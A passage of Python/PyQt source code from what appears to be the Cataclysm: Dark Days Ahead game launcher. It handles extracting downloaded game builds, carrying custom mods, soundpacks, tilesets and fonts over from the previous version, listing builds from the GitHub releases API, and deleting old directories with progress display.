else:\n self.backing_up_game = False\n self.extract_new_build()\n\n def extract_new_build(self):\n self.extracting_new_build = True\n\n z = zipfile.ZipFile(self.downloaded_file)\n self.extracting_zipfile = z\n\n self.extracting_infolist = z.infolist()\n self.extracting_index = 0\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.busy += 1\n\n extracting_label = QLabel()\n status_bar.addWidget(extracting_label, 100)\n self.extracting_label = extracting_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.extracting_progress_bar = progress_bar\n\n timer = QTimer(self)\n self.extracting_timer = timer\n\n progress_bar.setRange(0, len(self.extracting_infolist))\n\n def timeout():\n self.extracting_progress_bar.setValue(self.extracting_index)\n\n if self.extracting_index == len(self.extracting_infolist):\n self.extracting_timer.stop()\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n status_bar.removeWidget(self.extracting_label)\n status_bar.removeWidget(self.extracting_progress_bar)\n\n status_bar.busy -= 1\n\n self.extracting_new_build = False\n\n self.extracting_zipfile.close()\n\n # Keep a copy of the archive if selected in the settings\n if config_true(get_config_value('keep_archive_copy', 'False')):\n archive_dir = get_config_value('archive_directory', '')\n archive_name = os.path.basename(self.downloaded_file)\n move_target = os.path.join(archive_dir, archive_name)\n if (os.path.isdir(archive_dir)\n and not os.path.exists(move_target)):\n shutil.move(self.downloaded_file, archive_dir)\n\n download_dir = os.path.dirname(self.downloaded_file)\n delete_path(download_dir)\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n self.analysing_new_build = True\n game_dir_group_box.analyse_new_build(self.selected_build)\n\n else:\n extracting_element = self.extracting_infolist[\n self.extracting_index]\n self.extracting_label.setText(_('Extracting {0}').format(\n extracting_element.filename))\n\n try:\n self.extracting_zipfile.extract(extracting_element,\n self.game_dir)\n except OSError as e:\n # Display the error and stop the update process\n error_msgbox = QMessageBox()\n error_msgbox.setWindowTitle(\n _('Cannot extract game archive'))\n\n text = _('''\n

    The launcher failed to extract the game archive.

    \n

    It received the following error from the operating system: {error}

    '''\n ).format(error=html.escape(e.strerror))\n\n error_msgbox.setText(text)\n error_msgbox.addButton(_('OK'), QMessageBox.YesRole)\n error_msgbox.setIcon(QMessageBox.Critical)\n\n error_msgbox.exec()\n\n self.update_game()\n\n self.extracting_index += 1\n\n timer.timeout.connect(timeout)\n timer.start(0)\n\n def asset_name(self, path, filename):\n asset_file = os.path.join(path, filename)\n\n if not os.path.isfile(asset_file):\n disabled_asset_file = os.path.join(path, filename + '.disabled')\n if not os.path.isfile(disabled_asset_file):\n return None\n else:\n asset_file_path = disabled_asset_file\n else:\n asset_file_path = asset_file\n\n try:\n with open(asset_file_path, 'r', encoding='latin1') as f:\n for line in f:\n if line.startswith('NAME'):\n space_index = line.find(' ')\n name = line[space_index:].strip().replace(\n ',', '')\n return name\n except FileNotFoundError:\n return None\n return None\n\n def mod_ident(self, path):\n json_file = os.path.join(path, 'modinfo.json')\n if not os.path.isfile(json_file):\n json_file = os.path.join(path, 'modinfo.json.disabled')\n if os.path.isfile(json_file):\n try:\n with open(json_file, 'r', encoding='utf8') as f:\n try:\n values = json.load(f)\n if isinstance(values, dict):\n if values.get('type', '') == 'MOD_INFO':\n return values.get('ident', None)\n elif isinstance(values, list):\n for item in values:\n if (isinstance(item, dict)\n and item.get('type', '') == 'MOD_INFO'):\n return item.get('ident', None)\n except ValueError:\n pass\n except FileNotFoundError:\n return None\n\n return None\n\n def copy_next_dir(self):\n if self.in_post_extraction and len(self.previous_dirs) > 0:\n next_dir = self.previous_dirs.pop()\n src_path = os.path.join(self.previous_version_dir, next_dir)\n dst_path = os.path.join(self.game_dir, next_dir)\n if os.path.isdir(src_path) and not os.path.exists(dst_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_copy = ProgressCopyTree(src_path, dst_path,\n self.previous_dirs_skips, status_bar,\n _('{0} directory').format(next_dir))\n progress_copy.completed.connect(self.copy_next_dir)\n self.progress_copy = progress_copy\n progress_copy.start()\n else:\n self.copy_next_dir()\n elif self.in_post_extraction:\n self.progress_copy = None\n self.post_extraction_step2()\n\n def post_extraction(self):\n self.analysing_new_build = False\n self.in_post_extraction = True\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # Copy config, save, templates and memorial directory from previous\n # version\n previous_version_dir = os.path.join(self.game_dir, 'previous_version')\n if os.path.isdir(previous_version_dir) and self.in_post_extraction:\n\n previous_dirs = ['config', 'save', 'templates', 'memorial',\n 'graveyard', 'save_backups']\n if (config_true(get_config_value('prevent_save_move', 'False')) and\n 'save' in previous_dirs):\n previous_dirs.remove('save')\n\n self.previous_dirs = previous_dirs\n self.previous_version_dir = previous_version_dir\n\n # Skip debug files\n self.previous_dirs_skips = set()\n self.previous_dirs_skips.update((\n os.path.join(previous_version_dir, 'config', 'debug.log'),\n os.path.join(previous_version_dir, 'config', 'debug.log.prev')\n ))\n\n self.progress_copy = None\n self.copy_next_dir()\n elif self.in_post_extraction:\n # New install\n self.in_post_extraction = False\n self.finish_updating()\n\n def post_extraction_step2(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # Copy custom tilesets and soundpack from previous version\n # tilesets\n tilesets_dir = os.path.join(self.game_dir, 'gfx')\n previous_tilesets_dir = os.path.join(self.game_dir, 'previous_version',\n 'gfx')\n\n if (os.path.isdir(tilesets_dir) and os.path.isdir(previous_tilesets_dir)\n and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom tilesets'))\n\n official_set = {}\n for entry in os.listdir(tilesets_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(tilesets_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'tileset.txt')\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n\n previous_set = {}\n for entry in os.listdir(previous_tilesets_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(previous_tilesets_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'tileset.txt')\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n if not self.in_post_extraction:\n break\n\n target_dir = os.path.join(tilesets_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n # soundpacks\n soundpack_dir = os.path.join(self.game_dir, 'data', 'sound')\n previous_soundpack_dir = os.path.join(self.game_dir, 'previous_version',\n 'data', 'sound')\n\n if (os.path.isdir(soundpack_dir) and os.path.isdir(\n previous_soundpack_dir) and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom soundpacks'))\n\n official_set = {}\n for entry in os.listdir(soundpack_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(soundpack_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'soundpack.txt')\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n\n previous_set = {}\n for entry in os.listdir(previous_soundpack_dir):\n if not self.in_post_extraction:\n break\n\n entry_path = os.path.join(previous_soundpack_dir, entry)\n if os.path.isdir(entry_path):\n name = self.asset_name(entry_path, 'soundpack.txt')\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n if len(custom_set) > 0:\n self.soundpack_dir = soundpack_dir\n self.previous_soundpack_set = previous_set\n self.custom_soundpacks = list(custom_set)\n\n self.copy_next_soundpack()\n else:\n status_bar.clearMessage()\n self.post_extraction_step3()\n\n else:\n self.post_extraction_step3()\n\n def copy_next_soundpack(self):\n if self.in_post_extraction and len(self.custom_soundpacks) > 0:\n next_item = self.custom_soundpacks.pop()\n dst_path = os.path.join(self.soundpack_dir, os.path.basename(\n self.previous_soundpack_set[next_item]))\n src_path = self.previous_soundpack_set[next_item]\n if os.path.isdir(src_path) and not os.path.exists(dst_path):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_copy = ProgressCopyTree(src_path, dst_path, None,\n status_bar, _('{name} soundpack').format(name=next_item))\n progress_copy.completed.connect(self.copy_next_soundpack)\n self.progress_copy = progress_copy\n progress_copy.start()\n else:\n self.copy_next_soundpack()\n elif self.in_post_extraction:\n self.progress_copy = None\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n self.post_extraction_step3()\n\n def preserve_custom_fonts(self):\n \"\"\"\n Copy over any files in the previous font directory\n that don't already exist in the current font directory.\n\n This assumes that fonts distributed with CDDA have already\n been extracted into the current font directory.\n \"\"\"\n status_bar = self.get_main_window().statusBar()\n\n join_parts = lambda parts: Path(os.path.join(*parts))\n\n font_locations = [\n [self.game_dir, 'font'], # User fonts\n [self.game_dir, 'data', 'font'] # Game fonts\n ]\n\n prev_font_locations = [\n [base, 'previous_version'] + parts for base, *parts in font_locations\n ]\n\n # A list of tuples with the shape (CURRENT_FONT_DIR, PREV_FONT_DIR)\n font_paths = list(tuple(\n zip(\n map(join_parts, font_locations),\n map(join_parts, prev_font_locations)\n )\n ))\n\n if (any(font_paths) and self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom fonts'))\n\n for font_dir, prev_font_dir in font_paths:\n # Skip the dir if we have nothing to restore\n if not prev_font_dir.exists() or not prev_font_dir.is_dir():\n continue\n\n # Determine if the current version includes any bundled fonts\n if font_dir.is_dir():\n with os.scandir(font_dir) as entries:\n current_set = set(entries)\n else:\n # Create a new font directory if it doesn't already exist\n font_dir.mkdir(exist_ok=True)\n current_set = set()\n\n with os.scandir(prev_font_dir) as entries:\n previous_set = set(entries)\n\n # Determine what font files need to be restored\n delta = previous_set - current_set\n\n for entry in delta:\n source = prev_font_dir.joinpath(entry.name)\n target = font_dir.joinpath(entry.name)\n\n if entry.is_file():\n shutil.copy2(source, target)\n elif entry.is_dir():\n shutil.copytree(source, target)\n\n status_bar.clearMessage()\n\n def post_extraction_step3(self):\n if not self.in_post_extraction:\n return\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n # Copy custom mods from previous version\n # mods\n mods_dir = os.path.join(self.game_dir, 'data', 'mods')\n previous_mods_dir = os.path.join(self.game_dir, 'previous_version',\n 'data', 'mods')\n\n if (os.path.isdir(mods_dir) and os.path.isdir(previous_mods_dir) and\n self.in_post_extraction):\n status_bar.showMessage(_('Restoring custom mods'))\n\n official_set = {}\n for entry in os.listdir(mods_dir):\n entry_path = os.path.join(mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n previous_set = {}\n for entry in os.listdir(previous_mods_dir):\n entry_path = os.path.join(previous_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n target_dir = os.path.join(mods_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n if not self.in_post_extraction:\n return\n\n # user mods\n user_mods_dir = os.path.join(self.game_dir, 'mods')\n previous_user_mods_dir = os.path.join(self.game_dir, 'previous_version',\n 'mods')\n\n if (os.path.isdir(previous_user_mods_dir) and self.in_post_extraction):\n status_bar.showMessage(_('Restoring user custom mods'))\n\n if not os.path.exists(user_mods_dir):\n os.makedirs(user_mods_dir)\n\n official_set = {}\n for entry in os.listdir(user_mods_dir):\n entry_path = os.path.join(user_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in official_set:\n official_set[name] = entry_path\n previous_set = {}\n for entry in os.listdir(previous_user_mods_dir):\n entry_path = os.path.join(previous_user_mods_dir, entry)\n if os.path.isdir(entry_path):\n name = self.mod_ident(entry_path)\n if name is not None and name not in previous_set:\n previous_set[name] = entry_path\n\n custom_set = set(previous_set.keys()) - set(official_set.keys())\n for item in custom_set:\n target_dir = os.path.join(user_mods_dir, os.path.basename(\n previous_set[item]))\n if not os.path.exists(target_dir):\n shutil.copytree(previous_set[item], target_dir)\n\n status_bar.clearMessage()\n\n if not self.in_post_extraction:\n return\n\n # Copy user-default-mods.json if present\n user_default_mods_file = os.path.join(mods_dir, 'user-default-mods.json')\n previous_user_default_mods_file = os.path.join(previous_mods_dir, 'user-default-mods.json')\n\n if (not os.path.exists(user_default_mods_file)\n and os.path.isfile(previous_user_default_mods_file)):\n status_bar.showMessage(_('Restoring {0}').format('user-default-mods.json'))\n\n shutil.copy2(previous_user_default_mods_file,\n user_default_mods_file)\n\n status_bar.clearMessage()\n\n self.preserve_custom_fonts()\n\n if not self.in_post_extraction:\n return\n\n self.in_post_extraction = False\n\n if config_true(get_config_value('remove_previous_version', 'False')):\n self.remove_previous_version()\n else:\n self.after_updating_message()\n self.finish_updating()\n\n def remove_previous_version(self):\n previous_version_dir = os.path.join(self.game_dir, 'previous_version')\n\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n progress_rmtree = ProgressRmTree(previous_version_dir, status_bar,\n _('previous_version directory'))\n\n def rmtree_completed():\n self.progress_rmtree = None\n\n self.after_updating_message()\n self.finish_updating()\n\n progress_rmtree.completed.connect(rmtree_completed)\n progress_rmtree.aborted.connect(rmtree_completed)\n self.progress_rmtree = progress_rmtree\n progress_rmtree.start()\n\n def after_updating_message(self):\n main_window = self.get_main_window()\n status_bar = main_window.statusBar()\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if game_dir_group_box.previous_exe_path is not None:\n status_bar.showMessage(_('Update completed'))\n else:\n status_bar.showMessage(_('Installation completed'))\n\n if (game_dir_group_box.current_build is not None\n and status_bar.busy == 0):\n last_build = self.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == game_dir_group_box.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n\n def finish_updating(self):\n self.updating = False\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n game_dir_group_box.enable_controls()\n self.enable_controls(True)\n\n game_dir_group_box.update_soundpacks()\n game_dir_group_box.update_mods()\n game_dir_group_box.update_backups()\n\n soundpacks_tab = main_tab.get_soundpacks_tab()\n mods_tab = main_tab.get_mods_tab()\n settings_tab = main_tab.get_settings_tab()\n backups_tab = main_tab.get_backups_tab()\n\n soundpacks_tab.enable_tab()\n mods_tab.enable_tab()\n settings_tab.enable_tab()\n backups_tab.enable_tab()\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n else:\n self.update_button.setText(_('Install game'))\n\n if self.close_after_update:\n self.get_main_window().close()\n\n def download_http_ready_read(self):\n self.downloading_file.write(self.download_http_reply.readAll())\n\n def download_dl_progress(self, bytes_read, total_bytes):\n self.downloading_progress_bar.setMaximum(total_bytes)\n self.downloading_progress_bar.setValue(bytes_read)\n\n self.download_speed_count += 1\n\n self.downloading_size_label.setText(\n '{bytes_read}/{total_bytes}'\n .format(bytes_read=sizeof_fmt(bytes_read), total_bytes=sizeof_fmt(total_bytes))\n )\n\n if self.download_speed_count % 5 == 0:\n delta_bytes = bytes_read - self.download_last_bytes_read\n delta_time = datetime.utcnow() - self.download_last_read\n\n bytes_secs = delta_bytes / delta_time.total_seconds()\n self.dowloading_speed_label.setText(_('{bytes_sec}/s').format(\n bytes_sec=sizeof_fmt(bytes_secs)))\n\n self.download_last_bytes_read = bytes_read\n self.download_last_read = datetime.utcnow()\n\n def start_lb_request(self, base_asset, new_base_asset):\n self.disable_controls(True)\n self.refresh_warning_label.hide()\n self.find_build_warning_label.hide()\n\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.clearMessage()\n\n status_bar.busy += 1\n\n self.builds_combo.clear()\n self.builds_combo.addItem(_('Fetching remote builds'))\n\n url = cons.GITHUB_REST_API_URL + cons.CDDA_RELEASES\n self.base_asset = base_asset\n self.new_base_asset = new_base_asset\n\n fetching_label = QLabel()\n fetching_label.setText(_('Fetching: {url}').format(url=url))\n self.base_url = url\n status_bar.addWidget(fetching_label, 100)\n self.fetching_label = fetching_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.fetching_progress_bar = progress_bar\n\n progress_bar.setMinimum(0)\n\n self.lb_html = BytesIO()\n\n request = QNetworkRequest(QUrl(url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.http_reply = self.qnam.get(request)\n self.http_reply.finished.connect(self.lb_http_finished)\n self.http_reply.readyRead.connect(self.lb_http_ready_read)\n self.http_reply.downloadProgress.connect(self.lb_dl_progress)\n\n @property\n def app_locale(self):\n return QApplication.instance().app_locale\n\n def warn_rate_limit(self, requests_remaining, reset_dt):\n # Warn about remaining requests on GitHub API\n reset_dt_display = _('Unknown')\n if reset_dt is not None:\n reset_dt_local = reset_dt.astimezone(tz=None)\n reset_dt_display = format_datetime(reset_dt_local,\n format='long', locale=self.app_locale)\n\n message = _('You have {remaining} '\n 'request(s) remaining for accessing GitHub API.\\nYou will have to '\n 'wait until {datetime} to get more requests.\\nThose requests are '\n 'needed to get the available builds.\\nIf you keep running low on '\n 'those remaining requests, avoid quickly refreshing often\\n for the '\n 'available builds. For more information, search GitHub API rate '\n 'limiting.').format(\n remaining=requests_remaining,\n datetime=reset_dt_display\n )\n\n self.refresh_warning_label.show()\n self.refresh_warning_label.setToolTip(message)\n self.find_build_warning_label.setToolTip(message)\n\n selected_branch = self.branch_button_group.checkedButton()\n if selected_branch == self.experimental_radio_button:\n self.find_build_warning_label.show()\n\n def lb_http_finished(self):\n main_window = self.get_main_window()\n\n status_bar = main_window.statusBar()\n status_bar.removeWidget(self.fetching_label)\n status_bar.removeWidget(self.fetching_progress_bar)\n\n redirect = self.http_reply.attribute(\n QNetworkRequest.RedirectionTargetAttribute)\n if redirect is not None:\n redirected_url = urljoin(\n self.http_reply.request().url().toString(),\n redirect.toString())\n\n fetching_label = QLabel()\n fetching_label.setText(_('Fetching: {url}').format(\n url=redirected_url))\n self.base_url = redirected_url\n status_bar.addWidget(fetching_label, 100)\n self.fetching_label = fetching_label\n\n progress_bar = QProgressBar()\n status_bar.addWidget(progress_bar)\n self.fetching_progress_bar = progress_bar\n\n progress_bar.setMinimum(0)\n\n self.lb_html = BytesIO()\n\n request = QNetworkRequest(QUrl(redirected_url))\n request.setRawHeader(b'User-Agent',\n b'CDDA-Game-Launcher/' + version.encode('utf8'))\n request.setRawHeader(b'Accept', cons.GITHUB_API_VERSION)\n\n self.http_reply = self.qnam.get(request)\n self.http_reply.finished.connect(self.lb_http_finished)\n self.http_reply.readyRead.connect(self.lb_http_ready_read)\n self.http_reply.downloadProgress.connect(self.lb_dl_progress)\n return\n\n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n status_bar.busy -= 1\n\n if not game_dir_group_box.game_started:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Ready'))\n\n self.enable_controls()\n else:\n if status_bar.busy == 0:\n status_bar.showMessage(_('Game process is running'))\n\n requests_remaining = None\n if self.http_reply.hasRawHeader(cons.GITHUB_XRL_REMAINING):\n requests_remaining = self.http_reply.rawHeader(cons.GITHUB_XRL_REMAINING)\n requests_remaining = tryint(requests_remaining)\n\n reset_dt = None\n if self.http_reply.hasRawHeader(cons.GITHUB_XRL_RESET):\n reset_dt = self.http_reply.rawHeader(cons.GITHUB_XRL_RESET)\n reset_dt = tryint(reset_dt)\n reset_dt = arrow.get(reset_dt)\n\n if requests_remaining is not None and requests_remaining <= 10:\n self.warn_rate_limit(requests_remaining, reset_dt)\n\n status_code = self.http_reply.attribute(\n QNetworkRequest.HttpStatusCodeAttribute)\n if status_code != 200:\n reason = self.http_reply.attribute(\n QNetworkRequest.HttpReasonPhraseAttribute)\n url = self.http_reply.request().url().toString()\n msg = (\n _('Could not find launcher latest release when requesting {url}. Error: {error}')\n .format(url=url, error=f'[HTTP {status_code}] ({reason})')\n )\n if status_bar.busy == 0:\n status_bar.showMessage(msg)\n logger.warning(msg)\n\n self.builds = None\n\n self.builds_combo.clear()\n self.builds_combo.addItem(msg)\n self.builds_combo.setEnabled(False)\n\n self.lb_html = None\n return\n\n self.lb_html.seek(0)\n try:\n releases = json.loads(TextIOWrapper(self.lb_html, encoding='utf8'\n ).read())\n except json.decoder.JSONDecodeError:\n releases = []\n self.lb_html = None\n\n builds = []\n\n asset_platform = self.base_asset['Platform']\n asset_graphics = self.base_asset['Graphics']\n\n target_regex = re.compile(r'cataclysmdda-(?P.+)-' +\n re.escape(asset_platform) + r'-' +\n re.escape(asset_graphics) + r'-' +\n r'b?(?P\\d+)\\.zip'\n )\n \n new_asset_platform = self.new_base_asset['Platform']\n new_asset_graphics = self.new_base_asset['Graphics']\n\n new_target_regex = re.compile(\n r'cdda-windows-' +\n re.escape(new_asset_graphics) + r'-' +\n re.escape(new_asset_platform) + r'-' +\n r'b?(?P[0-9\\-]+)\\.zip'\n )\n\n build_regex = re.compile(r'[Bb]uild #?(?P[0-9\\-]+)')\n\n for release in releases:\n if any(x not in release for x in ('name', 'created_at')):\n continue\n\n build_match = build_regex.search(release['name'])\n if build_match is not None:\n asset = None\n if 'assets' in release:\n asset_iter = (\n x for x in release['assets']\n if 'browser_download_url' in x\n and 'name' in x\n and (\n target_regex.search(x['name']) is not None or\n new_target_regex.search(x['name']) is not None)\n )\n asset = next(asset_iter, None)\n\n build = {\n 'url': asset['browser_download_url'] if asset is not None\n else None,\n 'name': asset['name'] if asset is not None else None,\n 'number': build_match.group('build'),\n 'date': arrow.get(release['created_at']).datetime\n }\n builds.append(build)\n\n if len(builds) > 0:\n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{number} ({delta})'.format(number=build['number'], delta=human_delta),\n userData=build\n )\n\n combo_model = self.builds_combo.model()\n default_set = False\n for x in range(combo_model.rowCount()):\n if combo_model.item(x).data(Qt.UserRole)['url'] is None:\n combo_model.item(x).setEnabled(False)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - build unavailable'))\n elif not default_set:\n default_set = True\n self.builds_combo.setCurrentIndex(x)\n combo_model.item(x).setText(combo_model.item(x).text() +\n _(' - latest build available'))\n\n if not game_dir_group_box.game_started:\n self.builds_combo.setEnabled(True)\n else:\n self.previous_bc_enabled = True\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n\n if (game_dir_group_box.current_build is not None\n and status_bar.busy == 0\n and not game_dir_group_box.game_started):\n last_build = self.builds[0]\n\n message = status_bar.currentMessage()\n if message != '':\n message = message + ' - '\n\n if last_build['number'] == game_dir_group_box.current_build:\n message = message + _('Your game is up to date')\n else:\n message = message + _('There is a new update available')\n status_bar.showMessage(message)\n else:\n self.update_button.setText(_('Install game'))\n\n else:\n self.builds = None\n\n self.builds_combo.clear()\n self.builds_combo.addItem(_('Could not find remote builds'))\n self.builds_combo.setEnabled(False)\n\n def lb_http_ready_read(self):\n self.lb_html.write(self.http_reply.readAll())\n\n def lb_dl_progress(self, bytes_read, total_bytes):\n self.fetching_progress_bar.setMaximum(total_bytes)\n self.fetching_progress_bar.setValue(bytes_read)\n\n def show_hide_find_build(self):\n selected_branch = self.branch_button_group.checkedButton()\n\n widgets = (\n self.find_build_label,\n self.find_build_value,\n self.find_build_button\n )\n\n if selected_branch is self.stable_radio_button:\n for widget in widgets:\n widget.hide()\n self.find_build_warning_label.hide()\n elif selected_branch is self.experimental_radio_button:\n for widget in widgets:\n widget.show()\n if self.refresh_warning_label.isVisible():\n self.find_build_warning_label.show()\n\n def refresh_builds(self):\n selected_branch = self.branch_button_group.checkedButton()\n\n selected_platform = self.platform_button_group.checkedButton()\n\n if selected_platform is self.x64_radio_button:\n selected_platform = 'x64'\n elif selected_platform is self.x86_radio_button:\n selected_platform = 'x86'\n\n if selected_branch is self.stable_radio_button:\n # Populate stable builds and stable changelog\n\n # Add stable builds\n\n builds = []\n\n for stable_version in cons.STABLE_ASSETS:\n version_details = cons.STABLE_ASSETS[stable_version]\n\n build = {\n 'url': version_details['Tiles'][selected_platform],\n 'name': version_details['name'],\n 'number': version_details['number'],\n 'date': arrow.get(version_details['released_on']).datetime\n }\n builds.append(build)\n \n builds.sort(key=lambda x: (x['date'], x['number']), reverse=True)\n self.builds = builds\n\n self.builds_combo.clear()\n\n for build in builds:\n if build['date'] is not None:\n build_date = arrow.get(build['date'], 'UTC')\n human_delta = safe_humanize(build_date, arrow.utcnow(),\n locale=self.app_locale)\n else:\n human_delta = _('Unknown')\n\n self.builds_combo.addItem(\n '{name} ({delta}) [{number}]'.format(name=build['name'], delta=human_delta,\n number=build['number']), userData=build)\n \n main_tab = self.get_main_tab()\n game_dir_group_box = main_tab.game_dir_group_box\n\n if not game_dir_group_box.game_started:\n self.builds_combo.setEnabled(True)\n else:\n self.previous_bc_enabled = True\n\n if game_dir_group_box.exe_path is not None:\n self.update_button.setText(_('Update game'))\n else:\n self.update_button.setText(_('Install game'))\n\n # Populate stable changelog\n\n self.changelog_content.setHtml(cons.STABLE_CHANGELOG)\n\n \n elif selected_branch is self.experimental_radio_button:\n release_asset = cons.BASE_ASSETS['Tiles'][selected_platform]\n release_new_asset = cons.NEW_BASE_ASSETS['Tiles'][selected_platform]\n\n self.start_lb_request(release_asset, release_new_asset)\n self.refresh_changelog()\n\n def refresh_changelog(self):\n self.changelog_content.setHtml(_('

    Changelog is not available for experimental

    '))\n\n def branch_clicked(self, button):\n if button is self.stable_radio_button:\n config_value = cons.CONFIG_BRANCH_STABLE\n if button is self.experimental_radio_button:\n config_value = cons.CONFIG_BRANCH_EXPERIMENTAL\n \n set_config_value(cons.CONFIG_BRANCH_KEY, config_value)\n\n self.branch_changed()\n \n def branch_changed(self):\n # Perform branch change\n\n self.show_hide_find_build()\n\n # Change available builds and changelog\n self.refresh_builds()\n\n def platform_clicked(self, button):\n if button is self.x64_radio_button:\n config_value = 'x64'\n elif button is self.x86_radio_button:\n config_value = 'x86'\n\n set_config_value('platform', config_value)\n\n self.refresh_builds()\n\n\n# Recursively delete an entire directory tree while showing progress in a\n# status bar. Also display a dialog to retry the delete if there is a problem.\nclass ProgressRmTree(QTimer):\n completed = pyqtSignal()\n aborted = pyqtSignal()\n\n def __init__(self, src, status_bar, name):\n if not os.path.isdir(src):\n raise OSError(_(\"Source path '%s' is not a directory\") % src)\n\n super(ProgressRmTree, self).__init__()\n\n self.src = src\n\n self.status_bar = status_bar\n self.name = name\n\n self.started = False\n\n self.status_label = None\n self.progress_bar = None\n\n self.analysing = False\n self.deleting = False\n self.delete_completed = False\n\n def step(self):\n if self.analysing:\n if self.current_scan is None:\n self.current_scan = scandir(self.src)\n else:\n try:\n entry = next(self.current_scan)\n self.source_entries.append(entry)\n if entry.is_dir():\n self.next_scans.append(entry.path)\n elif entry.is_file():\n self.total_files += 1\n\n files_text = ngettext('file', 'files', self.total_files)\n\n self.status_label.setText(_('Analysing {name} - Found '\n '{file_count} {files}').format(\n name=self.name,\n file_count=self.total_files,\n files=files_text))\n\n except StopIteration:\n if len(self.next_scans) > 0:\n self.current_scan = scandir(self.next_scans.popleft())\n else:\n self.analysing = False\n\n if len(self.source_entries) > 0:\n self.deleting = True\n\n progress_bar = QProgressBar()\n progress_bar.setRange(0, self.total_files)\n progress_bar.setValue(0)\n self.status_bar.addWidget(progress_bar)\n self.progress_bar = progress_bar\n\n self.deleted_files = 0\n self.current_entry = None\n else:\n self.delete_completed = True\n self.stop()\n\n elif self.deleting:\n if self.current_entry is None:\n if len(self.source_entries) > 0:\n self.current_entry = self.source_entries.pop()\n self.display_entry(self.current_entry)\n else:\n # Remove the source directory\n while os.path.exists(self.src):\n try:\n try:\n os.rmdir(self.src)\n except OSError:\n # Remove read-only and try again\n os.chmod(self.src, stat.S_IWRITE)\n os.rmdir(self.src)\n except OSError as e:\n retry_msgbox = QMessageBox()\n retry_msgbox.setWindowTitle(\n _('Cannot remove directory'))\n\n process = None\n if e.filename is not None:\n process = find_process_with_file_handle(\n e.filename)\n\n text = _('''\n

    The launcher failed to remove the following directory: {directory}

    \n

    When trying to remove or access {filename}, the launcher raised the\nfollowing error: {error}

    ''').format(\n directory=html.escape(self.src),\n filename=html.escape(e.filename),\n error=html.escape(e.strerror))\n\n if process is None:\n text = text + _('''\n

    No process seems to be using that file or directory.

    ''')\n else:\n text = text + _('''\n

    The process {image_file_name} ({pid}) is currently using\nthat file or directory. You might need to end it if you want to retry.

